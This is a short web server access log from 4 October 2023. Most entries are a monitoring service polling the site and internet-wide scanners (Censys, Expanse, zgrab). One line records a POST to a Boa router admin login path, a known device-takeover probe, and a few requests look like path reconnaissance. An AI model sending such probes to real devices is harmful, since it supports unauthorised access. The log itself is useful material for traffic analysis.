212.91.246.72 - - [04/Oct/2023:08:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.7 - - [04/Oct/2023:08:23:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Oct/2023:08:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.53 - - [04/Oct/2023:08:27:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.53 - - [04/Oct/2023:08:27:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [04/Oct/2023:08:27:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.53 - - [04/Oct/2023:08:27:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Oct/2023:08:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.31 - - [04/Oct/2023:08:29:09 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:08:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.69.67 - - [04/Oct/2023:08:32:50 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
157.245.69.67 - - [04/Oct/2023:08:32:56 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
157.245.69.67 - - [04/Oct/2023:08:33:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:08:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
